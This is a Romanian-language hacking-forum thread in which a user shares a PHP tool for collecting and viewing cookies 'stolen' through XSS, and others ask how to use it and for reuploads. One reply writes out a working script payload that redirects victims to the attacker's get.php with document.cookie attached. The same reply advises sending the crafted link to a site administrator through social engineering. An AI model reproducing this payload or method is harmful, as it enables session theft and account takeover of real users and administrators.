robyyxx Posted December 18, 2013 Report Share Posted December 18, 2013 Pentru amatori de XSS va prezint un mic script PHP facut de mine care ajuta stocarea si vizualizarea cookie-urilor "furate".Utilitati:Login to view cookiesView cookies sourceView the date when it was stolenView IP of the userAutomatic remove dublicatesXSS/SQL protectionScreen:http://s2.postimg.org/4cu536o5l/cookie_stealer.pngInstalare:Trebuie editat "config.php" cu datele de la baza de date.Trebuie editat "install.php" cu datele cu care vrem sa intram in contRulam "install.php" apoi il stergemPentru a fura cookiul se face request pe "get.php?c="DownloadSunt la inceput in PHP daca aveti sugestii despre cum as putea sa fac codul mai eficient si mai scurt as vrea sa le aud.Initial aveam vreo 7 fisiere apoi le-am pus unul in altul unde mergea si am mai sters din surplus. Quote Link to comment Share on other sites More sharing options...
eusimplu Posted December 18, 2013 Report Share Posted December 18, 2013 Sfat: E un script single-user, foloseste SQLite pentru aplicatii single-user deoarece nu necesita configurare. Quote Link to comment Share on other sites More sharing options...
robyyxx Posted December 18, 2013 Author Report Share Posted December 18, 2013 Sfat: E un script single-user, foloseste SQLite pentru aplicatii single-user deoarece nu necesita configurare.Ok, ms o sa ma informez Quote Link to comment Share on other sites More sharing options...
BkDService Posted December 18, 2013 Report Share Posted December 18, 2013 frumos. il instalez maine Quote Link to comment Share on other sites More sharing options...
MeGusta Posted December 20, 2013 Report Share Posted December 20, 2013 Mie nu îmi merge, adic? la tabelu "Cookie" apare "logged=ok" ?i domeniu... dar dac? dau la al?i, nu merge... Quote Link to comment Share on other sites More sharing options...
robyyxx Posted December 20, 2013 Author Report Share Posted December 20, 2013 Mie nu îmi merge, adic? la tabelu "Cookie" apare "logged=ok" ?i domeniu... dar dac? dau la al?i, nu merge...Tu sti sa-l folosesti? Sti ce inseamna a "fura" un cookie? Din cate vad tu ti-ai furat singur cookie-ul.Edit:Informeazate putin despre cum functioneaza toata treaba cu cookie si cum se pot fura. Quote Link to comment Share on other sites More sharing options...
MeGusta Posted December 20, 2013 Report Share Posted December 20, 2013 Bun mi-am furat cookie-ul de la mine pentru test, dar dac? dau la al?i, nu merge... Quote Link to comment Share on other sites More sharing options...
carartem02 Posted December 28, 2013 Report Share Posted December 28, 2013 No logs... Quote Link to comment Share on other sites More sharing options...
h2ojust Posted January 10, 2014 Report Share Posted January 10, 2014 No logs...Asa apare si la mine de ce oare ? Quote Link to comment Share on other sites More sharing options...
yoyois Posted January 10, 2014 Report Share Posted January 10, 2014 Asa apare si la mine de ce oare ?Ca sa furi un cookie:Ai nevoie de o vulnerabilitate XSS pe care sa o folosesti pentru a executa javascript:Mai exact<script>document.location="http://site-ul_tau.com/get.php?c=" + document.cookie;</script>Pentru a fura cookie-ul cuiva trebuie ca sa-l "pacalesti" sa execute codul (prin XSS)Daca e persistent, traba merge usor. Daca nu, il poti folosi, trimitandu-l la prosti doar daca e prin get (desi nu recomand asta).Treaba merge bine daca creezi linkul cu parametru ce va executa javascriptul de mai sus si apoi il trimiti unui administrator cu ceva SE. Quote Link to comment Share on other sites More sharing options...
alexvenutelli Posted May 19, 2014 Report Share Posted May 19, 2014 pot sa mai fac si eu rost de unde de phpul respectiv ? ca vad ca nu mai e ... e deleted.. Quote Link to comment Share on other sites More sharing options...
zonamea Posted March 21, 2015 Report Share Posted March 21, 2015 REUPLOAD pleasesau ziceti altu Quote Link to comment Share on other sites More sharing options...
